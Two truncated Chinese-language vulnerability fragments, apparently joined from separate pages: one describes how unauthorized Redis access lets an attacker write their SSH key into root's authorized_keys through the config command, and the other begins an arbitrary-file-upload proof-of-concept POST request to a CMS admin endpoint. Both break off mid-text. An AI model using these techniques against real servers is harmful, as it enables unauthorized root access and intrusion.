## 一，漏洞介绍#CTL{\n}攻击者在未授权访问Redis的情况下，利用Redis自身的提供的config命令，可以进行写文件操作，攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中，进而可以使用对应私钥直接使用ssh服务器登录目标服务器#CTL{\n}**漏洞的产生条件有以下两点:**#CTL{\n}(1) Redis绑定在6

一，任意文件上传，构造数据包[POC]POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)